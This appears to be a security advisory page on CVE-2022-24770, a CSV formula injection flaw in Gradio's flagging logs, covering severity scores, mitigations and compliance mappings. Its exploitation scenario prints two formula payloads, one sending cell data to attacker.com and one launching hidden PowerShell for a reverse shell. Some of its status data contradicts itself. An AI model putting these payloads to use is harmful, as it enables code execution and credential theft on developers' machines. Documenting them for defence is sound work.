CVE-2022-24770: Gradio CSV formula injection

CISO Take

Any Gradio-based ML demo with flagging enabled allows end users to inject spreadsheet formulas into developer-side CSV logs. When a developer opens that CSV in Excel or similar tools, arbitrary commands execute on their machine — a classic developer-chain attack that pivots from a public ML interface to an internal workstation. Patch to 2.8.11 immediately; if unpatched, disable flagging or configure CSV consumers to never open these files in spreadsheet software.

What is the risk?

High risk for organizations running Gradio-powered demos or internal tools with flagging enabled. The attack requires no authentication, no AI/ML knowledge, and only basic formula injection skills — trivially accessible to any user of the demo. The impact lands on developer machines, not end users, making it a targeted developer-chain threat. Exposure is broad given Gradio's widespread adoption in ML prototyping and Hugging Face Spaces.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Gradio	pip	—	No patch
43.0K OpenSSF 5.6 685 dependents Pushed 4d ago 26% patched ~110d to patch Full package profile →

Do you use Gradio? You're affected.

How severe is it?

CVSS 3.1

8.8 / 10

EPSS

1.2%

chance of exploitation in 30 days

Higher than 65% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI Required

S Unchanged

C High

I High

A High

What should I do?

5 steps

Patch: Upgrade Gradio to 2.8.11 or later (single-quote escaping is applied to CSV outputs).
Workaround if patching is delayed: disable the flagging feature in Gradio configuration or restrict who can trigger flags.
Process control: instruct all team members to never open Gradio-generated CSVs directly in Excel — use Python/pandas for review instead.
Detection: search flagged CSV files for cells starting with =, +, -, or @ characters (formula injection markers).
Audit: review flagged CSV files already on disk for injected formulas before opening.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Inference AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.8.4 - AI system inputs A.9.2 - Testing and validation of AI system

NIST AI RMF

MANAGE-2.2 - Mechanisms to sustain the value of deployed AI are monitored and in place MAP-1.5 - Organizational risk tolerances are determined and documented

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2022-24770?

Any Gradio-based ML demo with flagging enabled allows end users to inject spreadsheet formulas into developer-side CSV logs. When a developer opens that CSV in Excel or similar tools, arbitrary commands execute on their machine — a classic developer-chain attack that pivots from a public ML interface to an internal workstation. Patch to 2.8.11 immediately; if unpatched, disable flagging or configure CSV consumers to never open these files in spreadsheet software.

Is CVE-2022-24770 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-24770, increasing the risk of exploitation.

How to fix CVE-2022-24770?

1. Patch: Upgrade Gradio to 2.8.11 or later (single-quote escaping is applied to CSV outputs). 2. Workaround if patching is delayed: disable the flagging feature in Gradio configuration or restrict who can trigger flags. 3. Process control: instruct all team members to never open Gradio-generated CSVs directly in Excel — use Python/pandas for review instead. 4. Detection: search flagged CSV files for cells starting with =, +, -, or @ characters (formula injection markers). 5. Audit: review flagged CSV files already on disk for injected formulas before opening.

What systems are affected by CVE-2022-24770?

This vulnerability affects the following AI/ML architecture patterns: ML demo platforms, model evaluation pipelines, data labeling and flagging workflows, model serving.

What is the CVSS score for CVE-2022-24770?

CVE-2022-24770 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 1.25%.

What is the AI security impact?

Affected AI Architectures

ML demo platformsmodel evaluation pipelinesdata labeling and flagging workflowsmodel serving

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0011 User Execution

AML.T0037 Data from Local System

AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Article 9

ISO 42001: A.8.4, A.9.2

NIST AI RMF: MANAGE-2.2, MAP-1.5

OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.

Exploitation Scenario

An adversary discovers a public-facing Gradio-based ML demo (e.g., a text classification or image captioning tool). They submit a crafted input containing a CSV formula payload such as `=HYPERLINK("http://attacker.com/"&C1,"Click")` or `=cmd|'/c powershell -nop -w hidden -enc <base64payload>'!A0` as the model input. Gradio's flagging mechanism saves this input verbatim to a CSV log on the developer's machine. When the developer reviews flagged samples in Excel to identify model weaknesses, the formula executes — delivering a reverse shell or exfiltrating environment variables and credentials from the developer workstation, providing a pivot point into the organization's internal infrastructure.

Weaknesses (CWE)

CWE-1236 Improper Neutralization of Formula Elements in a CSV File

CWE-1236 — Improper Neutralization of Formula Elements in a CSV File: The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.

[Implementation] When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
[Implementation] If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.

Source: MITRE CWE corpus.